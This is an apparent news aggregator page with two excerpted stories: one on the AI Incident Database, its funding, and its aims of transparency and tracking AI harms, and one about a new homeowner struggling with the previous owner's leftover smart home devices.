Initially launched as a project under the auspices of the Partnership On AI, a group that tries to ensure AI benefits society, the AI Incident Database is now a non-profit organization funded by Underwriters Laboratories – the largest and oldest (est. 1894) independent testing laboratory in the United States. It tests all sorts of products – from furniture to computer mouses – and its website has cataloged over 600 unique automation and AI-related incidents so far.

"There's a huge information asymmetry between the makers of AI systems and public consumers – and that's not fair", argued Patrick Hall, an assistant professor at the George Washington University School of Business, who is currently serving on the AI Incident Database's Board of Directors. He told The Register: "We need more transparency, and we feel it's our job just to share that information."

The AI Incident Database is modeled on the CVE Program set up by the non-profit MITRE and on the National Highway Traffic Safety Administration's database of vehicle crashes – systems that record publicly disclosed cyber security vulnerabilities and road accidents, respectively. "Any time there's a plane crash, train crash, or a big cyber security incident, it's become common practice over decades to record what happened so we can try to understand what went wrong and then not repeat it."

[...] The organization currently collects incidents from media coverage and reviews issues reported by people on Twitter. The AI Incident Database logged 250 unique incidents before the release of ChatGPT in November 2022, and now lists over 600 unique incidents.

[...] "AI is mostly a wild west right now, and the attitude is to go fast and break things," he lamented. It's not clear how the technology is shaping society, and the team hopes the AI Incident Database can provide insights in the ways it's being misused and highlight unintended consequences – in the hope that developers and policymakers are better informed so they can improve their models or regulate the most pressing risks.

[...] Frase is most concerned about the ways AI could erode human rights and civil liberties. She believes that collecting AI incidents will show if policies have made the technology safer over time.

"You have to measure things to fix things," Hall added.

The organization is always looking for volunteers and is currently focused on capturing more incidents and increasing awareness. Frase stressed that the group’s members are not AI luddites: "We're probably coming off as fairly anti-AI, but we're not. We actually want to use it. We just want the good stuff."


Original Submission

posted by janrinok on Monday March 11 2024, @01:24AM   Printer-friendly

https://www.theverge.com/24073300/smart-home-new-house-old-tech

My brother and his wife got a house. He mentioned it appeared to have a lot of tech installed by the last owner. I told him that was an exciting mystery for the two of us. Whatever speakers and weird smart home junk had been set up, we'd be able to repurpose. But then he moved in. Slowly, over weeks of tech support calls and hours digging through shockingly deep coat closets, we learned that while the old owner was gone, his digital ghost remained. It was lurking in the home's lights and shades and thermostat, turning what should have been a smart home into a very haunted one.

I didn't think I'd have to be the IT equivalent of a Ghostbuster when my brother first texted me about it. I've set up multiple smart homes, worked in IT, and currently am surrounded by some of the smartest tech journalists around. As smart home troubleshooting resources go, I have more than the average person.

It was no problem walking him through maximizing the performance of the Google Nest Wifi system still in place (including a full factory reset). But then... the trouble started. There were the window shades that always opened at 8AM and always closed at sundown. My brother disconnected everything that looked like a hub, and still, operating on some inaccessible internal clock, the shades carried on as they were once programmed to do.

[...] Some former homeowners will provide onboarding to the home's smart home system, but most do as the guy who used to own my brother's house did. They walk away and leave it as an adventure for the next person. I know because I've now done it twice myself. I really hope the new renters of my old Brooklyn walk-up appreciate all the 2014 Philips Hue lights I left installed in the basement.


Original Submission